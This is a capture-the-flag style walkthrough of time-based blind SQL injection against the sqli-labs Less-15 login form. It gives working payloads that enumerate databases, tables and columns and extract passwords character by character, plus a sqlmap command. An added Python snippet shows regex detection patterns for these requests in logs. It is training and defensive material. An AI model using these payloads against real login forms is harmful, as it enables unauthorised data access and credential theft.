1. Open Burp Suite and turn interception on, open Less-15, submit the login form, view the intercepted request in Burp, and send it to Repeater.
2. Try a single quote, a double quote and so on: the page shows no error message and has no output position, so time-based blind injection is used directly. First build a simple payload to determine how the string is closed; the single quote turns out to work.
uname=' and if('1'='1',sleep(5),1)#&passwd=&submit=Submit
3. Determine the number of databases
uname=' and if((select count(schema_name) from information_schema.schemata)=6,sleep(5),1)#&passwd=&submit=Submit
4. Extract the database names character by character
uname=' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))=105,sleep(5),1)#&passwd=&submit=Submit
5. Determine the number of tables
uname=' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)#&passwd=&submit=Submit
6. Extract the table names character by character
uname=' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(5),1)#&passwd=&submit=Submit
7. Determine the number of columns
uname=' and if((select count(column_name) from information_schema.columns where table_name='users')=6,sleep(5),1)#&passwd=&submit=Submit
8. Extract the column names character by character
uname=' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))<100,sleep(5),1)#&passwd=&submit=Submit
9. Determine the number of rows
uname=' and if((select count(password) from users)=17,sleep(5),1)#&passwd=&submit=Submit
10. Extract the data character by character
uname=' and if(ascii(substr((select password from users limit 0,1),1,1))<100,sleep(5),1)#&passwd=&submit=Submit
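From the defending side, the steps above leave a very recognisable trace: every request carries a quote, a SQL time-delay function and a trailing comment marker, and the character-by-character extraction sends many such requests from one source. The following is an added example (not code from the original post) that runs simple checks over constructed log lines in which the form body is recorded URL-encoded; the log format, the source addresses and the check names are assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample: one line per POST, as an application or reverse-proxy
# log might record the source address, path and URL-encoded form body.
SAMPLE_LOG = """\
10.0.0.5 POST /Less-15/ uname=admin&passwd=admin&submit=Submit
10.0.0.7 POST /Less-15/ uname=%27+and+if%28%271%27%3D%271%27%2Csleep%285%29%2C1%29%23&passwd=&submit=Submit
10.0.0.7 POST /Less-15/ uname=%27+and+if%28ascii%28substr%28%28select+schema_name+from+information_schema.schemata+limit+0%2C1%29%2C1%2C1%29%29%3D105%2Csleep%285%29%2C1%29%23&passwd=&submit=Submit
10.0.0.9 POST /Less-15/ uname=o%27brien&passwd=pass&submit=Submit
"""

# Each check maps a reason label to a pattern applied to the decoded value.
CHECKS = {
    "time_function": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "schema_probe": re.compile(r"\binformation_schema\.", re.I),
    "quote_then_comment": re.compile(r"'.*(#|--)", re.S),
}

def analyze_line(line):
    """Return a list of (source, field, reasons) for one log line."""
    src, _method, _path, body = line.split(" ", 3)
    findings = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:  # parse_qs already decodes '+' and %xx escapes
            reasons = [name for name, rx in CHECKS.items() if rx.search(value)]
            if reasons:
                findings.append((src, field, reasons))
    return findings

def blind_sqli_sources(log_text):
    """Count, per source, the requests that carry a time-delay function."""
    flagged = {}
    for line in log_text.splitlines():
        for src, _field, reasons in analyze_line(line):
            if "time_function" in reasons:
                flagged[src] = flagged.get(src, 0) + 1
    return flagged

if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        print(analyze_line(line))
    print(blind_sqli_sources(SAMPLE_LOG))
```

A lone apostrophe (the o'brien line) is not flagged on its own; only the combination of quote plus comment marker, or a delay or schema probe, counts.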
Alternatively, use sqlmap: save the intercepted request as a txt file and pass it in with -r (the options below are corrected to --batch and --columns, the forms sqlmap actually accepts).
python sqlmap.py -r "1.txt" --batch -p uname -D security --columns
over~